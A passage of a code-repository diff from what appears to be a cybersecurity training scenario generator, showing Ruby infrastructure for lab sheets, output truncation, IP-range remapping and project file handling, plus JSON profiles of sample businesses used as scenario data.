attack.xpath("tutorial").each do |tutorial_snippet|
lab_sheet += tutorial_snippet.content + "\n"
end
lab_sheet += "#### #{name} Attack ##{index + 1}\n"
lab_sheet += "Use what you have learned to complete the bot's challenge. You can skip the bot ahead to this point by saying '**goto #{index + 1}**'\n\n"
lab_sheet += "> #{name}: \"#{attack.xpath('prompt').first.content}\" \n\n"
lab_sheet += "Do any necessary preparation, then when you are ready for the bot to complete the action/attack, ==say 'ready'==\n\n"
if attack.xpath("quiz").size > 0
lab_sheet += "There is a quiz to complete. Once Hackerbot asks you the question you can =='answer *YOURANSWER*'==\n\n"
end
lab_sheet += "Don't forget to ==save and submit any flags!==\n\n"
end
lab_sheet += hackerbot.xpath("tutorial_info/footer").first.content + "\n"
lab_sheet
end
def generate
# Print.debug self.accounts.to_s
xml_template_out = ERB.new(File.read(self.config_template_path), 0, '<>-')
xml_config = xml_template_out.result(self.get_binding)
lab_sheet_markdown = generate_lab_sheet(xml_config)
redcarpet = Redcarpet::Markdown.new(Redcarpet::Render::HTML.new(prettify:true, hard_wrap: true, with_toc_data: true), footnotes: true, fenced_code_blocks: true, no_intra_emphasis: true, autolink: true, highlight: true, lax_spacing: true, tables: true)
self.html_rendered = redcarpet.render(lab_sheet_markdown).force_encoding('UTF-8')
redcarpet_toc = Redcarpet::Markdown.new(Redcarpet::Render::HTML_TOC.new())
self.html_TOC_rendered = redcarpet_toc.render(lab_sheet_markdown).force_encoding('UTF-8')
html_template_out = ERB.new(File.read(self.html_template_path), 0, '<>-')
html_out = html_template_out.result(self.get_binding)
json = {'xml_config' => xml_config.force_encoding('UTF-8'), 'html_lab_sheet' => html_out.force_encoding('UTF-8')}.to_json.force_encoding('UTF-8')
self.outputs << json.to_s
end
# Returns binding for erb files (access to variables in this classes scope)
# @return binding
def get_binding
binding
end
end
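The generator above renders its ERB templates against its own instance binding via `get_binding`. A minimal standalone sketch of that ERB-plus-binding pattern (the class and variable names here are illustrative, not from SecGen; note the `ERB.new(str, 0, '<>-')` positional form used above is pre-Ruby-2.6 style, replaced by the `trim_mode:` keyword):

```ruby
require 'erb'

# Hypothetical context object standing in for the generator: it holds the
# template data and exposes its scope to ERB via a binding.
class LabContext
  attr_accessor :title, :flags

  def initialize(title, flags)
    @title = title
    @flags = flags
  end

  # Returns binding for erb templates (access to this object's variables)
  def get_binding
    binding
  end
end

template = <<~XML
  <lab><name><%= @title %></name>
  <% @flags.each do |flag| -%>
  <flag><%= flag %></flag>
  <% end -%></lab>
XML

ctx = LabContext.new('Integrity Lab', %w[flag{abc} flag{def}])
# trim_mode '-' lets '-%>' suppress the newline after loop-control tags
xml = ERB.new(template, trim_mode: '-').result(ctx.get_binding)
puts xml
```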

View File

@@ -104,7 +104,17 @@ class StringEncoder
Print.local_verbose "Encoding '#{encoding_print_string}'"
encode_all
Print.local_verbose "Encoded: #{self.outputs.to_s}"
# print at most the first 1000 chars to screen
output = self.outputs.to_s
length = output.length
if length < 1000
Print.local_verbose "Encoded: #{output}"
else
Print.local_verbose "Encoded: #{output[0...1000]}..."
Print.local_verbose "(Displaying 1000/#{length} chars of output)"
end
puts has_base64_inputs ? base64_encode_outputs : self.outputs
end
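The same truncate-for-display logic appears in both StringEncoder and StringGenerator; it could be extracted into one shared helper, sketched below (the method name is hypothetical, not part of the codebase):

```ruby
# Hypothetical shared helper: return output unchanged when it fits,
# otherwise the first `limit` chars plus a note about how much was shown.
def truncate_for_display(output, limit = 1000)
  return output if output.length < limit
  "#{output[0...limit]}... (displaying #{limit}/#{output.length} chars)"
end

puts truncate_for_display('short string')
puts truncate_for_display('x' * 5000)[0, 60]
```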

View File

@@ -87,7 +87,17 @@ class StringGenerator
Print.local_verbose "Generating..."
generate
Print.local_verbose "Generated: #{self.outputs.to_s}"
# print at most the first 1000 chars to screen
output = self.outputs.to_s
length = output.length
if length < 1000
Print.local_verbose "Generated: #{output}"
else
Print.local_verbose "Generated: #{output[0...1000]}..."
Print.local_verbose "(Displaying 1000/#{length} chars of output)"
end
puts has_base64_inputs ? base64_encode_outputs : self.outputs
end

View File

@@ -8,7 +8,7 @@ class System
attr_accessor :module_selectors # (filters)
attr_accessor :module_selections # (after resolution)
attr_accessor :num_actioned_module_conflicts
attr_accessor :system_networks
attr_accessor :options #(command line options hash)
# Initalizes System object
# @param [Object] name of the system
@@ -20,14 +20,66 @@ class System
self.module_selectors = module_selectors
self.module_selections = []
self.num_actioned_module_conflicts = 0
self.system_networks = []
end
# selects from the available modules, based on the selection filters that have been specified
# @param [Object] available_modules all available modules (vulnerabilities, services, bases)
# @param [Object] options command line options hash
# @return [Object] the list of selected modules
def resolve_module_selection(available_modules)
def resolve_module_selection(available_modules, options)
retry_count = 0
# Replace $IP_addresses with options ip_ranges if required
begin
if options[:ip_ranges] and $datastore['IP_addresses'] and !$datastore['replaced_ranges']
unused_opts_ranges = options[:ip_ranges].clone
option_range_map = {} # k = ds_range, v = opts_range
new_ip_addresses = []
# Iterate over the DS IPs
$datastore['IP_addresses'].each do |ds_ip_address|
# Split the IP into ['X.X.X', 'Y']
split_ip = ds_ip_address.split('.')
ds_ip_array = [split_ip[0..2].join('.'), split_ip[3]]
ds_range = ds_ip_array[0] + '.0'
# Check if we have encountered first 3 octets before i.e. look in option_range_map for key(ds_range)
if option_range_map.has_key? ds_range
# if we have, grab that value (opts_range)
opts_range = option_range_map[ds_range]
# replace first 3 in ds_ip with first 3 in opts_range
split_opts_range = opts_range.split('.')
split_opts_range[3] = ds_ip_array[1]
new_ds_ip = split_opts_range.join('.')
# save in $datastore['IP_addresses']
new_ip_addresses << new_ds_ip
else #(if we haven't seen the first 3 octets before)
# grab the first range that we haven't used yet from unused_opts_ranges with .shift (also removes the range)
opts_range = unused_opts_ranges.shift
# store the range mapping in option_range_map (ds_range => opts_range)
option_range_map[ds_range] = opts_range
# split the opts_range and replace last octet with last octet of ds_ip_address
split_opts_range = opts_range.split('.')
split_opts_range[3] = ds_ip_array[1]
new_ds_ip = split_opts_range.join('.')
# save in $datastore['IP_addresses']
new_ip_addresses << new_ds_ip
end
end
$datastore['IP_addresses'] = new_ip_addresses
$datastore['replaced_ranges'] = true
end
rescue NoMethodError
required_ranges = []
$datastore['IP_addresses'].each { |ip_address|
split_range = ip_address.split('.')
split_range[3] = 0
required_ranges << split_range.join('.')
}
required_ranges.uniq!
Print.err("Fatal: Not enough ranges were provided with --network-ranges. Provided: #{options[:ip_ranges].size} Required: #{required_ranges.size}")
exit
end
begin
selected_modules = []
@@ -249,7 +301,14 @@ class System
end
end
# execute calculation script and format output to an array of Base64 strings
outputs = `ruby #{selected.local_calc_file} #{args_string}`.chomp
command = "ruby #{selected.local_calc_file} #{args_string}"
Print.verbose "Running: #{command}"
outputs = `#{command}`.chomp
unless $?.success?
Print.err "Module failed to run (#{command})"
# TODO: this works, but subsequent attempts at resolving the scenario always fail ("Error can't add no data...")
raise 'failed'
end
output_array = outputs.split("\n")
selected.output = output_array.map { |o| Base64.strict_decode64 o }
end
@@ -319,7 +378,7 @@ class System
if /^.*defaultinput/ =~ def_unique_id
def_unique_id = def_unique_id.gsub(/^.*defaultinput/, selected.unique_id)
end
default_modules_to_add.concat select_modules(module_to_add.module_type, module_to_add.attributes, available_modules, previously_selected_modules + default_modules_to_add, def_unique_id, module_to_add.write_output_variable, def_write_to, module_to_add.received_inputs, module_to_add.default_inputs_literals, module_to_add.write_to_datastore, module_to_add.received_datastores, module_to_add.write_module_path_to_datastore)
end
end
@@ -378,14 +437,4 @@ class System
modules_to_add
end
def get_networks
if (self.system_networks = []) # assign the networks
self.module_selections.each do |mod|
if mod.module_type == 'network'
self.system_networks << mod
end
end
end
self.system_networks
end
end
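The datastore remapping in `resolve_module_selection` can be sketched in isolation: each distinct first-three-octet prefix seen in the datastore IPs is assigned the next unused `--network-ranges` value, and last octets are preserved. A self-contained sketch of that mapping (the method name is illustrative, not from the codebase):

```ruby
# Remap each IP's /24 prefix onto the next unused replacement range,
# reusing the same replacement for repeated prefixes (mirrors the
# option_range_map logic in resolve_module_selection).
def remap_ip_ranges(ds_ips, opts_ranges)
  unused = opts_ranges.dup
  range_map = {} # 'X.X.X.0' => replacement range
  ds_ips.map do |ip|
    octets = ip.split('.')
    ds_range = "#{octets[0..2].join('.')}.0"
    opts_range = (range_map[ds_range] ||= unused.shift)
    raise 'Not enough ranges provided' if opts_range.nil?
    new_ip = opts_range.split('.')
    new_ip[3] = octets[3] # keep the host octet
    new_ip.join('.')
  end
end

puts remap_ip_ranges(
  ['10.0.0.2', '10.0.0.3', '172.16.0.2'],
  ['192.168.10.0', '192.168.20.0']
).inspect
```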

View File

@@ -34,11 +34,26 @@ class ProjectFilesCreator
# Generate all relevant files for the project
def write_files
# when writing to a project that already contains a project, move everything out the way,
# and keep the Vagrant config, so that existing VMs can be re-provisioned/updated
if File.exists? "#{@out_dir}/Vagrantfile" or File.exists? "#{@out_dir}/puppet"
dest_dir = "#{@out_dir}/MOVED_#{Time.new.strftime("%Y%m%d_%H%M")}"
Print.warn "Project already built to this directory -- moving last build to: #{dest_dir}"
Dir.glob( "#{@out_dir}/**/*" ).select { |f| File.file?( f ) }.each do |f|
dest = "#{dest_dir}/#{f}"
FileUtils.mkdir_p( File.dirname( dest ) )
if f =~ /\.vagrant/
FileUtils.cp( f, dest )
else
FileUtils.mv( f, dest )
end
end
end
FileUtils.mkpath "#{@out_dir}" unless File.exists?("#{@out_dir}")
FileUtils.mkpath "#{@out_dir}/puppet/" unless File.exists?("#{@out_dir}/puppet/")
FileUtils.mkpath "#{@out_dir}/environments/production/" unless File.exists?("#{@out_dir}/environments/production/")
threads = []
# for each system, create a puppet modules directory using librarian-puppet
@systems.each do |system|
@currently_processing_system = system # for template access
@@ -108,11 +123,11 @@ class ProjectFilesCreator
end
# Create the marker xml file
x2file = "#{@out_dir}/marker.xml"
x2file = "#{@out_dir}/flag_hints.xml"
xml_marker_generator = XmlMarkerGenerator.new(@systems, @scenario, @time)
xml = xml_marker_generator.output
Print.std "Creating marker file: #{x2file}"
Print.std "Creating flags and hints file: #{x2file}"
begin
File.open(x2file, 'w+') do |file|
file.write(xml)
@@ -121,6 +136,7 @@ class ProjectFilesCreator
Print.err "Error writing file: #{e.message}"
exit
end
Print.std "VM(s) can be built using 'vagrant up' in #{@out_dir}"
end
@@ -130,20 +146,28 @@ class ProjectFilesCreator
template_out = ERB.new(File.read(template), 0, '<>-')
begin
File.open(filename, 'w+') do |file|
File.open(filename, 'wb+') do |file|
file.write(template_out.result(self.get_binding))
end
rescue StandardError => e
Print.err "Error writing file: #{e.message}"
Print.err e.backtrace.inspect
exit
end
end
# Resolves the network based on the scenario and ip_range.
def resolve_network(scenario_ip_range)
# In the case that both command-line --network-ranges and datastores are provided, we have already handled the replacement of the ranges in the datastore.
# Because of this we prioritise datastore['IP_address'], then command line options (i.e. when no datastore is used, but the --network-ranges are passed), then the default network module's IP range.
def resolve_network(network_module)
current_network = network_module
scenario_ip_range = network_module.attributes['range'].first
# Prioritise datastore IP_address
if current_network.received_inputs.include? 'IP_address'
ip_address = current_network.received_inputs['IP_address'].first
elsif @options.has_key? :ip_ranges
# if we have options[:ip_ranges] we want to use those instead of the ip_range argument.
# Store the mappings of scenario_ip_ranges => @options[:ip_range] in @option_range_map
if @options.has_key? :ip_ranges
# Have we seen this scenario_ip_range before? If so, use the value we've assigned
if @option_range_map.has_key? scenario_ip_range
ip_range = @option_range_map[scenario_ip_range]
@@ -154,10 +178,14 @@ class ProjectFilesCreator
@option_range_map[scenario_ip_range] = options_ips.first
ip_range = options_ips.first
end
ip_address = get_ip_from_range(ip_range)
else
ip_range = scenario_ip_range
ip_address = get_ip_from_range(scenario_ip_range)
end
ip_address
end
def get_ip_from_range(ip_range)
# increment @scenario_networks{ip_range=>counter}
@scenario_networks[ip_range] += 1

View File

@@ -0,0 +1,47 @@
{
"business_name": "Artisan Bakery",
"business_motto": "The loaves are in the oven.",
"business_address": "1080 Headingley Lane, Headingley, Leeds, LS6 1BN",
"domain": "artisan-bakery.co.uk",
"office_telephone": "0113 222 1080",
"office_email": "orders@artisan-bakery.co.uk",
"industry": "Bakers",
"manager": {
"name": "Maxie Durgan",
"address": "1080 Headingley Lane, Headingley, Leeds, LS6 1BN",
"phone_number": "0113 222 1080",
"email_address": "maxie@artisan-bakery.co.uk",
"username": "maxie",
"password": ""
},
"employees": [
{
"name": "Matthew Riley",
"address": "1080 Headingley Lane, Headingley, Leeds, LS6 1BN",
"phone_number": "0113 222 1080",
"email_address": "matt@artisan-bakery.co.uk",
"username": "matt",
"password": ""
},
{
"name": "Emelie Lowe",
"address": "1080 Headingley Lane, Headingley, Leeds, LS6 1BN",
"phone_number": "0113 222 1080",
"email_address": "emelie@artisan-bakery.co.uk",
"username": "emelie",
"password": ""
},
{
"name": "Antonio Durgan",
"address": "1080 Headingley Lane, Headingley, Leeds, LS6 1BN",
"phone_number": "0113 222 1080",
"email_address": "antonio@artisan-bakery.co.uk",
"username": "antonio",
"password": ""
}
],
"product_name": "Baked goods",
"intro_paragraph": [
"Finest bakery in Headingley since 1900. Baked fresh daily. Bread loaves, teacakes, sweet and savoury treats. We are open from 9 am til 6 pm, every day except for bank holidays."
]
}

View File

@@ -0,0 +1,47 @@
{
"business_name": "Northern Banking",
"business_motto": "We'll keep your money safe!",
"business_address": "123 The Headrow, Leeds, LS1 5RD",
"domain": "northernbanking.co.uk",
"office_telephone": "0113 000 0123",
"office_email": "enquiries@northernbanking.co.uk",
"industry": "Finance",
"manager": {
"name": "Heather Schmidt",
"address": "800 Bogisich Avenue, Oswaldohaven, Leeds, LS9 6NB",
"phone_number": "07836 581948",
"email_address": "h.schmidt@northernbanking.co.uk",
"username": "h_schmidt",
"password": ""
},
"employees": [
{
"name": "Zion Jacobson",
"address": "104 Cole Square, ",
"phone_number": "07880 057670",
"email_address": "z.jacobson@northernbanking.co.uk",
"username": "z_jacobson",
"password": ""
},
{
"name": "Jonathan Ray",
"address": "644 Jackson Path, Leeds, LS2 4AJ",
"phone_number": "07893 001623",
"email_address": "j.ray@northernbanking.co.uk",
"username": "j_ray",
"password": ""
},
{
"name": "Virginia Sullivan",
"address": "23 Jane Street, Harrogate, HG1 4DJ",
"phone_number": "07826 576277",
"email_address": "v.sullivan@northernbanking.co.uk",
"username": "v_sullivan",
"password": ""
}
],
"product_name": "Financial Services",
"intro_paragraph": [
"About Northern Bank","With roots going back to its establishment in Huddersfield, West Yorkshire in 1805, Northern Bank has a strong personal customer base and business banking capability through a UK-wide network. Northern Bank is a trading name of Big Bank PLC."
]
}

View File

@@ -0,0 +1,48 @@
{
"business_name": "The Yorkshire Fitness Company",
"business_motto": "Get thi sen down't gym!",
"business_address": "15 Sheepscar Court, Leeds LS7 2BB",
"domain": "yorkshirefitco.co.uk",
"office_telephone": "0113 026 9999",
"office_email": "office@yorkshirefitco.co.uk",
"industry": "Health and Fitness",
"manager": {
"name": "Jerry Rivera",
"address": "15 Sheepscar Court, Leeds LS7 2BB",
"phone_number": "0113 026 9999",
"email_address": "jerry.rivera@yorkshirefitco.co.uk",
"username": "jerry_rivera",
"password": ""
},
"employees": [
{
"name": "Immanuel Bahringer IV",
"address": "15 Sheepscar Court, Leeds LS7 2BB",
"phone_number": "07688 112479",
"email_address": "immanuel.bahringer.iv@yorkshirefitco.co.uk",
"username": "immanuel_bahringer_iv",
"password": ""
},
{
"name": "Anne Hunter",
"address": "15 Sheepscar Court, Leeds LS7 2BB",
"phone_number": "07791 179177",
"email_address": "anne.hunter@yorkshirefitco.co.uk",
"username": "anne_hunter",
"password": ""
},
{
"name": "Katelin Langworth",
"address": "15 Sheepscar Court, Leeds LS7 2BB",
"phone_number": "07550 561978",
"email_address": "katelin.langworth@yorkshirefitco.co.uk",
"username": "katelin_langworth",
"password": ""
}
],
"product_name": "",
"intro_paragraph": [
"Experience Yorkshire's leading health and fitness club, located not far from the city centre. Established in 1990, The Yorkshire Fitness Company is committed to getting you the results you want.",
"If you like classes, the gym or a combo of both, our dedicated professional team of coaches & teachers are always available to motivate you and guide you towards your goals."
]
}

View File

@@ -0,0 +1,47 @@
{
"business_name": "Abacus Technology Solutions",
"business_motto": "Solving your problems so you don't have to.",
"business_address": "Unit 12, Lincoln St, Huddersfield HD1 6RX",
"domain": "abacus-technology.co.uk",
"office_telephone": "01484 850963",
"office_email": "office@abacus-technology.co.uk",
"industry": "IT Services",
"manager": {
"name": "Ellie Bosco",
"address": "Office 1, Unit 12, Lincoln St, Huddersfield HD1 6RX",
"phone_number": "07528 347828",
"email_address": "e.bosco@abacus-technology.co.uk",
"username": "ebosco",
"password": ""
},
"employees": [
{
"name": "Keara Harris",
"address": "Office 2, Unit 12, Lincoln St, Huddersfield HD1 6RX",
"phone_number": "07674 358645",
"email_address": "k.harris@abacus-technology.co.uk",
"username": "kharris",
"password": ""
},
{
"name": "Janessa Rempel",
"address": "Office 2, Unit 12, Lincoln St, Huddersfield HD1 6RX",
"phone_number": "07644 118595",
"email_address": "j.rempel@abacus-technology.co.uk",
"username": "jrempel",
"password": ""
},
{
"name": "Russell Ramirez",
"address": "Office 3, Unit 12, Lincoln St, Huddersfield HD1 6RX",
"phone_number": "01484 850963",
"email_address": "r.ramirez@abacus-technology.co.uk",
"username": "rramirez",
"password": ""
}
],
"product_name": "IT Solutions",
"intro_paragraph": [
"Providers of cloud services, backups, data recovery, hardware, off-the-shelf and bespoke software. 24/7 technical support available. Custom design and installation based on your company's needs!"
]
}

View File

@@ -0,0 +1,9 @@
{"business_name":"Artisan Bakery","business_motto":"The loaves are in the oven.","business_address":"1080 Headingley Lane, Headingley, Leeds, LS6 1BN","domain":"artisan-bakery.co.uk","office_telephone":"0113 222 1080","office_email":"orders@artisan-bakery.co.uk","industry":"Bakers","manager":{"name":"Maxie Durgan","address":"1080 Headingley Lane, Headingley, Leeds, LS6 1BN","phone_number":"07645 289149","email_address":"maxie@artisan-bakery.co.uk","username":"maxie","password":""},"employees":[{"name":"Matthew Riley","address":"1080 Headingley Lane, Headingley, Leeds, LS6 1BN","phone_number":"07876 518651","email_address":"matt@artisan-bakery.co.uk","username":"matt","password":""},{"name":"Emelie Lowe","address":"1080 Headingley Lane, Headingley, Leeds, LS6 1BN","phone_number":"07560 246931","email_address":"emelie@artisan-bakery.co.uk","username":"emelie","password":""},{"name":"Antonio Durgan","address":"1080 Headingley Lane, Headingley, Leeds, LS6 1BN","phone_number":"07943 250930","email_address":"antonio@artisan-bakery.co.uk","username":"antonio","password":""}],"product_name":"Baked goods","intro_paragraph":["Finest bakery in Headingley since 1900. Baked fresh daily. Bread loaves, teacakes, sweet and savoury treats. We are open from 9 am til 6 pm, every day except for bank holidays."]}
{"business_name":"Northern Banking","business_motto":"We'll keep your money safe!","business_address":"123 The Headrow, Leeds, LS1 5RD","domain":"northernbanking.co.uk","office_telephone":"0113 000 0123","office_email":"enquiries@northernbanking.co.uk","industry":"Finance","manager":{"name":"Heather Schmidt","address":"800 Bogisich Avenue, Oswaldohaven, Leeds, LS9 6NB","phone_number":"07836 581948","email_address":"h.schmidt@northernbanking.co.uk","username":"h_schmidt","password":""},"employees":[{"name":"Zion Jacobson","address":"104 Cole Square, ","phone_number":"07880 057670","email_address":"z.jacobson@northernbanking.co.uk","username":"z_jacobson","password":""},{"name":"Jonathan Ray","address":"644 Jackson Path, Leeds, LS2 4AJ","phone_number":"07893 001623","email_address":"j.ray@northernbanking.co.uk","username":"j_ray","password":""},{"name":"Virginia Sullivan","address":"23 Jane Street, Harrogate, HG1 4DJ","phone_number":"07826 576277","email_address":"v.sullivan@northernbanking.co.uk","username":"v_sullivan","password":""}],"product_name":"Financial Services","intro_paragraph":["About Northern Bank","With roots going back to its establishment in Huddersfield, West Yorkshire in 1805, Northern Bank has a strong personal customer base and business banking capability through a UK-wide network. Northern Bank is a trading name of Big Bank PLC."]}
{"business_name":"Yorkshire Fitness Company","business_motto":"Get thi sen down't gym!","business_address":"15 Sheepscar Court, Leeds LS7 2BB","domain":"yorkshirefitco.co.uk","office_telephone":"0113 026 9999","office_email":"office@yorkshirefitco.co.uk","industry":"Health and Fitness","manager":{"name":"Jerry Rivera","address":"15 Sheepscar Court, Leeds LS7 2BB","phone_number":"0113 026 9999","email_address":"jerry.rivera@yorkshirefitco.co.uk","username":"jerry_rivera","password":""},"employees":[{"name":"Immanuel Bahringer IV","address":"15 Sheepscar Court, Leeds LS7 2BB","phone_number":"07688 112479","email_address":"immanuel.bahringer.iv@yorkshirefitco.co.uk","username":"immanuel_bahringer_iv","password":""},{"name":"Anne Hunter","address":"15 Sheepscar Court, Leeds LS7 2BB","phone_number":"07791 179177","email_address":"anne.hunter@yorkshirefitco.co.uk","username":"anne_hunter","password":""},{"name":"Katelin Langworth","address":"15 Sheepscar Court, Leeds LS7 2BB","phone_number":"07550 561978","email_address":"katelin.langworth@yorkshirefitco.co.uk","username":"katelin_langworth","password":""}],"product_name":"","intro_paragraph":["Experience Yorkshire's leading health and fitness club, located not far from the city centre. Established in 1990, The Yorkshire Fitness Company is committed to getting you the results you want.","If you like classes, the gym or a combo of both, our dedicated professional team of coaches & teachers are always available to motivate you and guide you towards your goals."]}
{"business_name":"Abacus Technology Solutions","business_motto":"Solving your problems so you don't have to.","business_address":"Unit 12, Lincoln St, Huddersfield HD1 6RX","domain":"abacus-technology.co.uk","office_telephone":"01484 850963","office_email":"office@abacus-technology.co.uk","industry":"IT Services","manager":{"name":"Ellie Bosco","address":"Office 1, Unit 12, Lincoln St, Huddersfield HD1 6RX","phone_number":"07528 347828","email_address":"e.bosco@abacus-technology.co.uk","username":"ebosco","password":""},"employees":[{"name":"Keara Harris","address":"Office 2, Unit 12, Lincoln St, Huddersfield HD1 6RX","phone_number":"07674 358645","email_address":"k.harris@abacus-technology.co.uk","username":"kharris","password":""},{"name":"Janessa Rempel","address":"Office 2, Unit 12, Lincoln St, Huddersfield HD1 6RX","phone_number":"07644 118595","email_address":"j.rempel@abacus-technology.co.uk","username":"jrempel","password":""},{"name":"Russell Ramirez","address":"Office 3, Unit 12, Lincoln St, Huddersfield HD1 6RX","phone_number":"01484 850963","email_address":"r.ramirez@abacus-technology.co.uk","username":"rramirez","password":""}],"product_name":"IT Solutions","intro_paragraph":["Providers of cloud services, backups, data recovery, hardware, off-the-shelf and bespoke software. 24/7 technical support available. Custom design and installation based on your company's needs!"]}
{"business_name":"Leeds Beckett","business_motto":"Computer Forensics and Security","business_address":"43 Church Wood Ave, Leeds LS16 5LF","domain":"leedsbeckett.ac.uk","office_telephone":"0113 81 23000","office_email":"study@leedsbeckett.ac.uk","industry":"Higher Education","manager":{"name":"Emlyn Butterfield","address":"115, Caedmon Hall, Headingley Campus","phone_number":"0113 81 24440","email_address":"E.Butterfield@leedsbeckett.ac.uk","username":"ebutterfield","password":""},"employees":[{"name":"Dr. Z. Cliffe Schreuders","address":"105, Caedmon Hall, Headingley Campus","phone_number":"0113 81 28608","email_address":"C.Schreuders@leedsbeckett.ac.uk","username":"zschreuders","password":""},{"name":"Dr. Maurice Calvert","address":"117, Caedmon, Headingley Campus","phone_number":"0113 81 27429","email_address":"M.Calvert@leedsbeckett.ac.uk","username":"mcalvert","password":""},{"name":"Dr. John Elliott","address":"108, Caedmon, Headingley Campus","phone_number":"0113 81 27379","email_address":"J.Elliott@leedsbeckett.ac.uk","username":"jelliott","password":""}],"product_name":"University Education","intro_paragraph":["Computer forensics involves the analysis of digital devices such as hard drives to identify and investigate their contents. Computer security involves using knowledge of computer systems and networks to protect businesses and users from malicious attacks.","This course combines these two fields of national importance and will teach you practical investigative and 'hacking' techniques. You will develop the skills to undertake rigorous forensic analysis and implement robust security mechanisms.","This is a hands-on course where you will learn through doing, gaining an in-depth knowledge of how to hack a computer to be able to protect it. You will learn where a computer hides data and how to recover information from a device."]}
{"business_name":"Leeds Beckett","business_motto":"Leeds Law School","business_address":"City Campus, Leeds LS1 3HE","domain":"leedsbeckett.ac.uk","office_telephone":"0113 81 23000","office_email":"study@leedsbeckett.ac.uk","industry":"Higher Education","manager":{"name":"Deveral Capps","address":"306, Portland Building, City Campus","phone_number":"0113 81 26085","email_address":"d.capps@leedsbeckett.ac.uk","username":"d_capps","password":""},"employees":[{"name":"Dr. Simon Hale-Ross","address":"306, Portland Building, City Campus","phone_number":"0113 8129526","email_address":"S.Haleross@leedsbeckett.ac.uk","username":"s_haleross","password":""},{"name":"Professor Simon Gardiner","address":"204, Rose Bowl, City Campus","phone_number":"0113 81 26414","email_address":"S.Gardiner@leedsbeckett.ac.uk","username":"s_gardiner","password":""},{"name":"Dr. Jessica Guth","address":"306, Portland Building, City Campus","phone_number":"0113 81 26403","email_address":"J.Guth@leedsbeckett.ac.uk","username":"j_guth","password":""}],"product_name":"University Education","intro_paragraph":["Our Law School sits in the heart of the great city of Leeds, the most important legal centre outside London and home to over 180 law firms employing in excess of 8,000 professionals. It is perfectly placed to ensure all our undergraduate, postgraduate, full and part-time students are able to mine the wealth of practical experience and employment opportunities available on our doorstep.","With state-of-the-art facilities, mentoring and career development opportunities, placements and a courtroom, students who choose Leeds Law School can expect a successful career founded on high calibre, practical teaching. We offer a broad variety of courses including our LLB, LLM Legal Practice (incorporating the LPC), LLM Qualifying Law Degree (incorporating the GDL) and LLM International Business Law, and each aims to give our graduates the enthusiasm, sharpness of mind and practical tools to thrive in competitive and fast-paced professional environments."]}
{"business_name":"Leeds Beckett","business_motto":"Music and Performing Arts","business_address":"43 Church Wood Ave, Leeds LS16 5LF","domain":"leedsbeckett.ac.uk","office_telephone":"0113 81 23000","office_email":"study@leedsbeckett.ac.uk","industry":"Higher Education","manager":{"name":"Dr Richard Stevens","address":"209, Caedmon, Headingley Campus","phone_number":"0113 81 23690","email_address":"R.C.Stevens@leedsbeckett.ac.uk","username":"r_stevens","password":""},"employees":[{"name":"Dr. Laura Griffiths","address":"Reception, Priestley Hall, Headingley Campus","phone_number":"n/a","email_address":"Laura.Griffiths@leedsbeckett.ac.uk","username":"l_griffiths","password":""},{"name":"Carl Flattery","address":"104, Caedmon, Headingley Campus","phone_number":"0113 81 27372","email_address":"C.Flattery@leedsbeckett.ac.uk","username":"c_flattery","password":""},{"name":"Sam Nicholls","address":"212, Caedmon, Headingley Campus","phone_number":"0113 81 23726","email_address":"S.Nicholls@leedsbeckett.ac.uk","username":"s_nicholls","password":""}],"product_name":"University Education","intro_paragraph":["The School of Film, Music & Performing Arts fosters a culture of creation and participation. We are proud shapers of, and contributors to, the cultural life of this great Northern city, a city that is the original birthplace of film. We nurture the arts pioneers of the future: influencers who will not just reflect the outside world, but impact upon it."]}
{"business_name":"Yorkshire Personal Health","business_motto":"We'll have you as good as new in no time.","business_address":"159 Longlands St, Bradford BD1 2PX","domain":"yorkspersonalhealth.co.uk","office_telephone":"01274 200700","office_email":"info@yorkspersonalhealth.co.uk","industry":"Medical Services","manager":{"name":"Angela Dickinson","address":"76103 Joshuah Path, Port Magali, Cambridgeshire, R1 1TR","phone_number":"01274 200700 ext 100","email_address":"a.dickinson@yorkspersonalhealth.co.uk","username":"dickinson_a","password":""},"employees":[{"name":"Abdullah Carroll","address":"Office A, 160 Longlands St, Bradford BD1 2PX","phone_number":"01274 200700 ext 101","email_address":"a.carroll@yorkspersonalhealth.co.uk","username":"carroll_a","password":""},{"name":"Annie Williamson","address":"Office B, 160 Longlands St, Bradford BD1 2PX","phone_number":"01274 200700 ext 103","email_address":"a.williamson@yorkspersonalhealth.co.uk","username":"williamson_a","password":""},{"name":"Jammie Marks","address":"Office B, 160 Longlands St, Bradford BD1 2PX","phone_number":"01274 200700 ext 110","email_address":"j.marks@yorkspersonalhealth.co.uk","username":"marks_j","password":""}],"product_name":"Check up","intro_paragraph":["A health assessment is more than a check up. It can be the start of a journey towards better health.","We use our health expertise to build a clear picture of where your current health is and identify potential future health risks. After your health assessment, we'll give you guidance and support to help you become healthier today and in the future."]}
{"business_name":"Speedy Pizzas","business_motto":"Pizza done quick.","business_address":"195 Headingley Lane, Headingley, Leeds, LS6 1BN","domain":"speedypizzas.co.uk","office_telephone":"0113 123 3214","office_email":"info@speedypizzas.co.uk","industry":"Food","manager":{"name":"David Sand","address":"195 Headingley Lane, Headingley, Leeds, LS6 1BN","phone_number":"07879 635412","email_address":"dave@speedypizzas.co.uk","username":"d_sand","password":""},"employees":[{"name":"Cydney Hermann","address":"195 Headingley Lane, Headingley, Leeds, LS6 1BN","phone_number":"0113 123 3214","email_address":"cydney@speedypizzas.co.uk","username":"c_hermann","password":""},{"name":"Lori Marshall","address":"195 Headingley Lane, Headingley, Leeds, LS6 1BN","phone_number":"0113 123 3214","email_address":"lori@speedypizzas.co.uk","username":"l_marshall","password":""},{"name":"Andrea Martinez","address":"195 Headingley Lane, Headingley, Leeds, LS6 1BN","phone_number":"0113 123 3214","email_address":"andrea@speedypizzas.co.uk","username":"a_martinez","password":""}],"product_name":"Pizza","intro_paragraph":["Welcome to speedy pizzas. Piping hot food either in store or delivered to your door. Pizza takeaway, parmesan, kebabs and much more.","We are based in the centre of Headingley on Headingley lane and will deliver up to 3 miles for free, 1 quid per additional mile. Red hot pizza on delivery or your money back."]}

View File

@@ -0,0 +1,49 @@
{
"business_name": "Leeds Beckett - Computer Forensics and Security",
"business_motto": "",
"business_address": "43 Church Wood Ave, Leeds LS16 5LF",
"domain": "leedsbeckett.ac.uk",
"office_telephone": "0113 81 23000",
"office_email": "study@leedsbeckett.ac.uk",
"industry": "Higher Education",
"manager": {
"name": "Emlyn Butterfield",
"address": "115, Caedmon Hall, Headingley Campus",
"phone_number": "0113 81 24440",
"email_address": "E.Butterfield@leedsbeckett.ac.uk",
"username": "ebutterfield",
"password": ""
},
"employees": [
{
"name": "Dr. Z. Cliffe Schreuders",
